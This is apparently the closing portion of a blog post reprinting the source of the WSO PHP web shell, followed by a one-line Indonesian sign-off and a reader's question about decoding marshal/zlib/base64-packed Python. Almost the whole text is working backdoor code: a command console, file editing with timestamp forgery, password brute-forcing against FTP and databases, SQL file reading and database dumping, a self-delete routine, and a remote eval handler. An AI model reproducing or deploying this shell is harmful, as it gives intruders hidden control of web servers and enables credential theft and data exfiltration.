                    echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
            break;
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            if( !empty($_POST['p3']) ) {
                $time = @filemtime($_POST['p1']);
                $_POST['p3'] = substr($_POST['p3'],1);
                $fp = @fopen($_POST['p1'],"w");
                if($fp) {
                    @fwrite($fp,$_POST['p3']);
                    @fclose($fp);
                    echo 'Saved!<br><script>p3_="";</script>';
                    @touch($_POST['p1'],$time,$time);
                }
            }
            echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
            }
            echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
            break;
        case 'rename':
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can\'t rename!<br>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
            break;
        case 'touch':
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(!touch($_POST['p1'],$time,$time))
                        echo 'Fail!';
                    else
                        echo 'Touched!';
                } else echo 'Bad time format!';
            }
            clearstatcache();
            echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
            break;
    }
    echo '</div>';
    wsoFooter();
}

function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);

    if(isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
        ob_start();
        echo "d.cf.cmd.value='';\n";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "c_='".$GLOBALS['cwd']."';";
            }
        }
        echo "d.cf.output.value+='".$temp."';";
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), "\n", $temp;
        exit;
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
    wsoHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push('');
    cur = cmds.length-1;
}
</script>";
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }

    echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
    }
    echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
    echo '</form></div><script>d.cf.cmd.focus();</script>';
    wsoFooter();
}

function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
    die('bye!');
}

function actionSelfRemove() {

    if($_POST['p1'] == 'yes')
        if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    wsoFooter();
}

function actionBruteforce() {
    wsoHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function wsoBruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function wsoBruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function wsoBruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                $res = @pg_connect($str);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="root"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    wsoFooter();
}

function actionSql() {
    class DbClass {
        var $type;
        var $link;
        var $res;

        function __construct($type) {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname){
            switch($this->type) {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        function selectdb($db) {
            switch($this->type) {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type) {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type) {
                case 'mysql':
                        return $this->query("SHOW databases");
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                break;
            }
            return false;
        }
        function listTables() {
            switch($this->type) {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                break;
            }
            return false;
        }
        function error() {
            switch($this->type) {
                case 'mysql':
                    return @mysql_error();
                break;
                case 'pgsql':
                    return @pg_last_error();
                break;
            }
            return false;
        }
        function setCharset($str) {
            switch($this->type) {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'pgsql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        function loadFile($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                break;
                case 'pgsql':
                    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
                    $r=array();
                    while($i=$this->fetch())
                        $r[] = $i['file'];
                    $this->query('drop table wso2');
                    return array('file'=>implode("\n",$r));
                break;
            }
            return false;
        }
        function dump($table, $fp = false) {
            switch($this->type) {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
                    $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
                    while($item = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }

                        $columns = array();
                        foreach($item as $k=>$v) {
                            if($v === null)
                                $item[$k] = "NULL";
                            elseif(is_int($v))
                                $item[$k] = $v;
                            else
                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $item).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
                    }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
                    }
                break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    if(@$_POST['p2']=='download') {
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
                $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
    }
    wsoHeader();
    echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    echo "</td>
                <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
            </tr>
        </table>
        <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
            function st(t,l) {
                d.sf.p1.value = 'select';
                d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
                d.sf.submit();
            }
            function is() {
                for(i=0;i<d.sf.elements['tbl[]'].length;++i)
                    d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
            }
        </script>";
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty($_POST['sql_base'])){
                $db->selectdb($_POST['sql_base']);
                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
                $tbls_res = $db->listTables();
                while($item = $db->fetch($tbls_res)) {
                    list($key, $value) = each($item);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                    $value = htmlspecialchars($value);
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
                }
                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
                if(@$_POST['p1'] == 'select') {
                    $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
                    $num = $db->fetch();
                    $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
                    $_POST['p3']--;
                    if($_POST['type']=='pgsql')
                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo "<br><br>";
                }
                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
                    $db->query(@$_POST['p2']);
                    if($db->res !== false) {
                        $title = false;
                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
                        $line = 1;
                        while($item = $db->fetch()) {
                            if(!$title) {
                                echo '<tr>';
                                foreach($item as $key => $value)
                                    echo '<th>'.$key.'</th>';
                                reset($item);
                                $title=true;
                                echo '</tr><tr>';
                                $line = 2;
                            }
                            echo '<tr class="l'.$line.'">';
                            $line = $line==1?2:1;
                            foreach($item as $key => $value) {
                                if($value == null)
                                    echo '<td><i>null</i></td>';
                                else
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
                            }
                            echo '</tr>';
                        }
                        echo '</table>';
                    } else {
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
                    }
                }
                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
                echo "</td></tr>";
            }
            echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
            if(@$_POST['p1'] == 'loadfile') {
                $file = $db->loadFile($_POST['p2']);
                echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
            }
    } else {
        echo htmlspecialchars($db->error());
    }
    echo '</div>';
    wsoFooter();
}
function actionRC() {
    if(!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);
exit;

Demikianlah tutorial singkat kali ini, semoga bermanfaat.

Zen
Bertanya

Klo yang Decrypt Marshall,zlib,base64 gmna gan Yang kaya gini import marshal,zlib,base64 exec(marshal.loads(zlib.decompress(base64.b64decode("eJybla bla blablablablabla